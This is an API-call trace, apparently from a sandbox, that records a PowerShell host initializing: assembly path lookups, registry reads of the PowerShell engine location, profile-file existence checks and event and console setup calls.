	[0531.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0531.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0532.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0532.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0532.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0532.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0532.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0532.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0532.309] VirtualQuery (in: lpAddress=0x14b7b0, lpBuffer=0x14c670, dwLength=0x30 | out: lpBuffer=0x14c670*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0532.314] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0532.314] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0532.314] CoTaskMemFree (pv=0x3ad740) 
	[0532.330] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0532.330] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0532.330] CoTaskMemFree (pv=0x3ad740) 
	[0532.331] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0532.331] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0532.331] CoTaskMemFree (pv=0x3ad740) 
	[0532.331] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0532.331] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0532.331] CoTaskMemFree (pv=0x3ad740) 
	[0532.334] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0532.334] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0532.334] CoTaskMemFree (pv=0x3ad740) 
	[0533.089] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0533.089] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0533.089] CoTaskMemFree (pv=0x3ad740) 
	[0533.090] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0533.090] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0533.091] CoTaskMemFree (pv=0x3ad740) 
	[0533.096] VirtualQuery (in: lpAddress=0x14b7b0, lpBuffer=0x14c670, dwLength=0x30 | out: lpBuffer=0x14c670*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0534.012] VirtualQuery (in: lpAddress=0x14b7b0, lpBuffer=0x14c670, dwLength=0x30 | out: lpBuffer=0x14c670*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0534.020] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0534.020] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0534.020] CoTaskMemFree (pv=0x3ad740) 
	[0536.596] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x3adb80
	[0536.598] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x3adc90
	[0542.610] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0542.610] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0542.610] CoTaskMemFree (pv=0x3adda0) 
	[0542.631] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0542.631] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0542.631] CoTaskMemFree (pv=0x3adda0) 
	[0542.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0542.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0542.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0542.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0544.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0544.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0544.794] VirtualQuery (in: lpAddress=0x14ba60, lpBuffer=0x14c920, dwLength=0x30 | out: lpBuffer=0x14c920*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0544.802] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d8b8 | out: phkResult=0x14d8b8*=0x394) returned 0x0
	[0544.802] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d83c, lpData=0x0, lpcbData=0x14d838*=0x0 | out: lpType=0x14d83c*=0x1, lpData=0x0, lpcbData=0x14d838*=0x56) returned 0x0
	[0544.802] CoTaskMemAlloc (cb=0x5a) returned 0x1b979190
	[0544.802] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d80c, lpData=0x1b979190, lpcbData=0x14d808*=0x56 | out: lpType=0x14d80c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d808*=0x56) returned 0x0
	[0544.802] CoTaskMemFree (pv=0x1b979190) 
	[0544.802] RegCloseKey (hKey=0x394) returned 0x0
	[0544.802] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d8b8 | out: phkResult=0x14d8b8*=0x394) returned 0x0
	[0544.802] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d83c, lpData=0x0, lpcbData=0x14d838*=0x0 | out: lpType=0x14d83c*=0x1, lpData=0x0, lpcbData=0x14d838*=0x56) returned 0x0
	[0544.803] CoTaskMemAlloc (cb=0x5a) returned 0x1b979190
	[0544.803] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d80c, lpData=0x1b979190, lpcbData=0x14d808*=0x56 | out: lpType=0x14d80c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d808*=0x56) returned 0x0
	[0544.803] CoTaskMemFree (pv=0x1b979190) 
	[0544.803] RegCloseKey (hKey=0x394) returned 0x0
	[0544.804] CoTaskMemAlloc (cb=0x20c) returned 0x3e8b50
	[0544.804] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3e8b50 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0544.804] CoTaskMemFree (pv=0x3e8b50) 
	[0544.804] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x14d470, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0544.804] CoTaskMemAlloc (cb=0x20c) returned 0x3e8b50
	[0544.804] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3e8b50 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0544.804] CoTaskMemFree (pv=0x3e8b50) 
	[0544.804] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x14d470, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0544.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x14d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0544.805] SetErrorMode (uMode=0x1) returned 0x1
	[0544.805] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14d820 | out: lpFileInformation=0x14d820*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0544.805] SetErrorMode (uMode=0x1) returned 0x1
	[0544.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x14d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0544.805] SetErrorMode (uMode=0x1) returned 0x1
	[0544.806] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14d820 | out: lpFileInformation=0x14d820*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0544.806] SetErrorMode (uMode=0x1) returned 0x1
	[0544.806] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x14d610, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0544.806] SetErrorMode (uMode=0x1) returned 0x1
	[0544.806] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14d820 | out: lpFileInformation=0x14d820*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0544.806] SetErrorMode (uMode=0x1) returned 0x1
	[0544.806] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x14d610, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0544.806] SetErrorMode (uMode=0x1) returned 0x1
	[0544.806] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14d820 | out: lpFileInformation=0x14d820*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0544.806] SetErrorMode (uMode=0x1) returned 0x1
	[0544.807] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0544.807] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0544.807] CoTaskMemFree (pv=0x3adda0) 
	[0544.807] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0544.807] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0544.808] CoTaskMemFree (pv=0x3adda0) 
	[0544.808] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0544.808] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0544.808] CoTaskMemFree (pv=0x3adda0) 
	[0544.808] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0544.808] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0544.809] CoTaskMemFree (pv=0x3adda0) 
	[0544.813] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0544.813] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0544.813] CoTaskMemFree (pv=0x3adda0) 
	[0544.815] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x394
	[0544.815] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x300
	[0544.815] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1c8
	[0544.815] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x324
	[0544.815] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x328
	[0544.815] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x32c
	[0544.816] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x330
	[0544.816] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x334
	[0544.816] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x338
	[0544.816] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x398
	[0544.816] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x348
	[0544.816] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x34c
	[0544.819] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0544.819] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0544.819] CoTaskMemFree (pv=0x3adda0) 
	[0544.821] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0544.822] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x14da00 | out: lpMode=0x14da00) returned 1
	[0544.824] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0544.824] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0544.824] CoTaskMemFree (pv=0x3adda0) 
	[0544.829] SetEvent (hEvent=0x324) returned 1
	[0544.830] SetEvent (hEvent=0x394) returned 1
